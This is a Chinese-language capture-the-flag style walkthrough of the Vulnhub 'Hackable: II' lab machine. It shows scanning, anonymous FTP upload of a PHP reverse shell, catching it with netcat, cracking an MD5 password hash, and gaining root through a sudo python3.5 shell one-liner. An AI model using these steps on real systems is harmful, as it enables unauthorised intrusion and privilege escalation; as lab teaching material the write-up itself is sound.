Vulnhub之Hackable II靶机详细解题过程
Hackable II
作者: Jason_huawen
靶机基本信息
名称:Hackable: II
地址:https://www.vulnhub.com/entry/hackable-ii,711/
识别目标主机IP地址
┌──(kali㉿kali)-[~/Vulnhub/Hackable_II]
└─$ sudo netdiscover -i eth1
Currently scanning: 192.168.217.0/16 | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:0a 1 60 Unknown vendor
192.168.56.100 08:00:27:69:61:df 1 60 PCS Systemtechnik GmbH
192.168.56.207 08:00:27:1d:cd:39 1 60 PCS Systemtechnik GmbH
利用Kali Linux自带的netdiscover工具识别目标主机的IP地址为192.168.56.207
NMAP扫描
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.207 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-22 00:10 EST
Nmap scan report for bogon (192.168.56.207)
Host is up (0.00054s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r-- 1 0 0 109 Nov 26 2020 CALL.html
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 2f:c6:2f:c4:6d:a6:f5:5b:c2:1b:f9:17:1f:9a:09:89 (RSA)
| 256 5e:91:1b:6b:f1:d8:81:de:8b:2c:f3:70:61:ea:6f:29 (ECDSA)
|_ 256 f1:98:21:91:c8:ee:4d:a2:83:14:64:96:37:5b:44:3d (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.18 (Ubuntu)
MAC Address: 08:00:27:1D:CD:39 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.69 seconds
NMAP扫描结果表明目标主机有3个开放端口:21(FTP)、22(SSH)以及80(HTTP)
Get Access
从目标主机的FTP服务开始信息收集:
┌──(kali㉿kali)-[~/Vulnhub/Hackable_II]
└─$ ftp 192.168.56.207
Connected to 192.168.56.207.
220 ProFTPD Server (ProFTPD Default Installation) [192.168.56.207]
Name (192.168.56.207:kali): anonymous
331 Anonymous login ok, send your complete email address as your password
Password:
230 Anonymous access granted, restrictions apply
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -alh
229 Entering Extended Passive Mode (|||48553|)
150 Opening ASCII mode data connection for file list
drwxr-xrwx 2 33 33 4.0k Nov 26 2020 .
drwxr-xrwx 2 33 33 4.0k Nov 26 2020 ..
-rw-r--r-- 1 0 0 109 Nov 26 2020 CALL.html
226 Transfer complete
ftp> get CALL.html
local: CALL.html remote: CALL.html
229 Entering Extended Passive Mode (|||46279|)
150 Opening BINARY mode data connection for CALL.html (109 bytes)
100% |********************************| 109 231.40 KiB/s 00:00 ETA
226 Transfer complete
109 bytes received in 00:00 (78.67 KiB/s)
ftp> quit
221 Goodbye.
看到一个文件: CALL.html,将其下载到Kali Linux本地进行查看,文件内容本身没有太大价值。
──(kali㉿kali)-[~/Vulnhub/Hackable_II]
└─$ cat CALL.html
<html>
<head>
<title>onion</title>
</head>
<body>
<h1>GET READY TO RECEIVE A CALL</h1>
</body>
</html>
浏览器访问80端口,返回apache默认页面,但是页面中有以下注释:
<!--
Do you like gobuster? dirb? etc...
-->
┌──(kali㉿kali)-[~/Vulnhub/Hackable_II]
└─$ gobuster dir -u http://192.168.56.207 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.207
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.3
[+] Timeout: 10s
===============================================================
2022/11/22 00:14:14 Starting gobuster in directory enumeration mode
===============================================================
/files (Status: 301) [Size: 316] [--> http://192.168.56.207/files/]
/server-status (Status: 403) [Size: 279]
Progress: 217567 / 220561 (98.64%)===============================================================
2022/11/22 00:14:37 Finished
===============================================================
这个files目录里的文件就是FTP服务器中的CALL.html,那是不是意味着可以将shell.php通过FTP方式上传,然后浏览器访问该shell.php从而得到shell?
┌──(kali㉿kali)-[~/Vulnhub/Hackable_II]
└─$ curl http://192.168.56.207/files/
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
<head>
<title>Index of /files</title>
</head>
<body>
<h1>Index of /files</h1>
<table>
<tr><th valign="top"><img src="/icons/blank.gif" alt="[ICO]"></th><th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size</a></th><th><a href="?C=D;O=A">Description</a></th></tr>
<tr><th colspan="5"><hr></th></tr>
<tr><td valign="top"><img src="/icons/back.gif" alt="[PARENTDIR]"></td><td><a href="/">Parent Directory</a></td><td> </td><td align="right"> - </td><td> </td></tr>
<tr><td valign="top"><img src="/icons/text.gif" alt="[TXT]"></td><td><a href="CALL.html">CALL.html</a></td><td align="right">2020-11-26 13:02 </td><td align="right">109 </td><td> </td></tr>
<tr><th colspan="5"><hr></th></tr>
</table>
<address>Apache/2.4.18 (Ubuntu) Server at 192.168.56.207 Port 80</address>
</body></html>
──(kali㉿kali)-[~/Vulnhub/Hackable_II]
└─$ ftp 192.168.56.207
Connected to 192.168.56.207.
220 ProFTPD Server (ProFTPD Default Installation) [192.168.56.207]
Name (192.168.56.207:kali): anonymous
331 Anonymous login ok, send your complete email address as your password
Password:
230 Anonymous access granted, restrictions apply
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -alh
229 Entering Extended Passive Mode (|||11174|)
150 Opening ASCII mode data connection for file list
drwxr-xrwx 2 33 33 4.0k Nov 26 2020 .
drwxr-xrwx 2 33 33 4.0k Nov 26 2020 ..
-rw-r--r-- 1 0 0 109 Nov 26 2020 CALL.html
226 Transfer complete
ftp> put shell.php
local: shell.php remote: shell.php
229 Entering Extended Passive Mode (|||20677|)
150 Opening BINARY mode data connection for shell.php
100% |***********************************************************************************************************************************************************************************************| 5496 121.89 MiB/s 00:00 ETA
226 Transfer complete
5496 bytes sent in 00:00 (9.16 MiB/s)
ftp> ls
229 Entering Extended Passive Mode (|||49299|)
150 Opening ASCII mode data connection for file list
-rw-r--r-- 1 0 0 109 Nov 26 2020 CALL.html
-rw-r--r-- 1 ftp ftp 5496 Nov 22 05:19 shell.php
226 Transfer complete
ftp>
发现可以成功上传shell.php文件,然后看能否访问到这个php,应该在files目录下,浏览器可以成功访问:
http://192.168.56.207/files/shell.php
在Kali Linux成功得到目标主机反弹回来的shell:
┌──(kali㉿kali)-[~/Vulnhub/Hackable_II]
└─$ sudo nc -nlvp 5555
[sudo] password for kali:
listening on [any] 5555 ...
connect to [192.168.56.206] from (UNKNOWN) [192.168.56.207] 55092
Linux ubuntu 4.4.0-194-generic #226-Ubuntu SMP Wed Oct 21 10:19:36 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
02:20:46 up 22 min, 0 users, load average: 0.23, 1.64, 1.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ which python
$ which python3
/usr/bin/python3
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@ubuntu:/$
在/home目录下有个文件:
www-data@ubuntu:~/html/files$ cd /home
cd /home
www-data@ubuntu:/home$ ls
ls
important.txt shrek
www-data@ubuntu:/home$ cat important.txt
cat important.txt
run the script to see the data
/.runme.sh
www-data@ubuntu:/home$
www-data@ubuntu:/home$ ls -alh /.runme.sh
ls -alh /.runme.sh
-rwxr-xr-x 1 shrek shrek 1.2K Nov 26 2020 /.runme.sh
www-data@ubuntu:/home$ cat /.runme.sh
cat /.runme.sh
#!/bin/bash
echo 'the secret key'
sleep 2
echo 'is'
sleep 2
echo 'trolled'
sleep 2
echo 'restarting computer in 3 seconds...'
sleep 1
echo 'restarting computer in 2 seconds...'
sleep 1
echo 'restarting computer in 1 seconds...'
sleep 1
echo '⡴⠑⡄⠀⠀⠀⠀⠀⠀⠀ ⣀⣀⣤⣤⣤⣀⡀
⠸⡇⠀⠿⡀⠀⠀⠀⣀⡴⢿⣿⣿⣿⣿⣿⣿⣿⣷⣦⡀
⠀⠀⠀⠀⠑⢄⣠⠾⠁⣀⣄⡈⠙⣿⣿⣿⣿⣿⣿⣿⣿⣆
⠀⠀⠀⠀⢀⡀⠁⠀⠀⠈⠙⠛⠂⠈⣿⣿⣿⣿⣿⠿⡿⢿⣆
⠀⠀⠀⢀⡾⣁⣀⠀⠴⠂⠙⣗⡀⠀⢻⣿⣿⠭⢤⣴⣦⣤⣹⠀⠀⠀⢀⢴⣶⣆
⠀⠀⢀⣾⣿⣿⣿⣷⣮⣽⣾⣿⣥⣴⣿⣿⡿⢂⠔⢚⡿⢿⣿⣦⣴⣾⠸⣼⡿
⠀⢀⡞⠁⠙⠻⠿⠟⠉⠀⠛⢹⣿⣿⣿⣿⣿⣌⢤⣼⣿⣾⣿⡟⠉
⠀⣾⣷⣶⠇⠀⠀⣤⣄⣀⡀⠈⠻⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡇
⠀⠉⠈⠉⠀⠀⢦⡈⢻⣿⣿⣿⣶⣶⣶⣶⣤⣽⡹⣿⣿⣿⣿⡇
⠀⠀⠀⠀⠀⠀⠀⠉⠲⣽⡻⢿⣿⣿⣿⣿⣿⣿⣷⣜⣿⣿⣿⡇
⠀⠀ ⠀⠀⠀⠀⠀⢸⣿⣿⣷⣶⣮⣭⣽⣿⣿⣿⣿⣿⣿⣿⠇
⠀⠀⠀⠀⠀⠀⣀⣀⣈⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⠇
⠀⠀⠀⠀⠀⠀⢿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿
shrek:cf4c2232354952690368f1b3dfdfb24d'
www-data@ubuntu:/home$
该脚本有个md5加密值,用MD5解密在线网站解密,解密得到:onion,应该是shrek的密码
www-data@ubuntu:/home$ su - shrek
su - shrek
Password: onion
shrek@ubuntu:~$ id
id
uid=1000(shrek) gid=1000(shrek) groups=1000(shrek)
shrek@ubuntu:~$
成功切换到了shrek用户
提权
shrek@ubuntu:~$ sudo -l
sudo -l
Matching Defaults entries for shrek on ubuntu:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User shrek may run the following commands on ubuntu:
(root) NOPASSWD: /usr/bin/python3.5
shrek@ubuntu:~$
可以利用Python3.5提权,参考GTFOBINS网站给出的方法进行提权:
Sudo
If the binary is allowed to run as superuser by sudo, it does not drop the elevated privileges and may be used to access the file system, escalate or maintain privileged access.
sudo python -c 'import os; os.system("/bin/sh")'
sudo /usr/bin/python3.5 -c 'import os; os.system("/bin/sh")'
# id
id
uid=0(root) gid=0(root) groups=0(root)
# cd /root
cd /root
# ls -ahl
ls -ahl
total 32K
drw------- 4 root root 4.0K Jun 15 2021 .
drwxr-xr-x 23 root root 4.0K Nov 26 2020 ..
-rw------- 1 root root 13 Jun 15 2021 .bash_history
-rw------- 1 root root 3.1K Oct 22 2015 .bashrc
drw------- 2 root root 4.0K Nov 25 2020 .cache
drw------- 2 root root 4.0K Nov 25 2020 .nano
-rw------- 1 root root 148 Aug 17 2015 .profile
-rw------- 1 root root 1.6K Jun 15 2021 root.txt
# cat root.txt
cat root.txt
____
____....----''''```` |.
,'''```` ____....----; '.
| __....----''''```` .-.`'. '.
|.-. ..... | | '. '.
`| | ..:::::::::::::::| | .-;. |
| |`'-;-::::::::::::::::::::| |,,.| |-='
| | | ::::::::::::::::::::| | | |
| | | :::::::::::::::;;;;;| | | |
| | | :::::::::;;;2KY2KY2Y| | | |
| | | :::::;;Y2KY2KY2KY2KY| | | |
| | | :::;Y2Y2KY2KY2KY2KY2| | | |
| | | :;Y2KY2KY2KY2KY2K+++| | | |
| | | |;2KY2KY2KY2++++++++| | | |
| | | | ;++++++++++++++++;| | | |
| | | | ;++++++++++++++;.| | | |
| | | | :++++++++++++: | | | |
| | | | .:++++++++;. | | | |
| | | | .:;+:.. | | | |
| | | | ;; | | | |
| | | | .,:+;:,. | | | |
| | | | .::::;+::::, | | | |
| | | | ::::::;;::::::. | | | |
| | | | :::::::+;:::::::.| | | |
| | | | ::::::::;;::::::::| | | |
| | | |:::::::::+:::::::::| | | |
| | | |:::::::::+:::::::::| | | |
| | | ::::::::;+++;:::::::| | | |
| | | :::::::;+++++;::::::| | | |
| | | ::::::;+++++++;:::::| | | |
| | |.:::::;+++++++++;::::| | | |
| | ,`':::::;+++++++++++;:::| |'"-| |-..
| |' ::::;+++++++++++++;::| | '-' ,|
| | ::::;++++++++++++++;:| | .' |
,;-'_ `-._===++++++++++_.-'| | .' .'
| ````'''----....___-' '-' .' .'
'---....____ ````'''--; ,'
````''''----....____|.'
invite-me: https://www.linkedin.com/in/eliastouguinho/#
成功提权,拿到root flag.
STRIVE FOR PROGRESS,NOT FOR PERFECTION
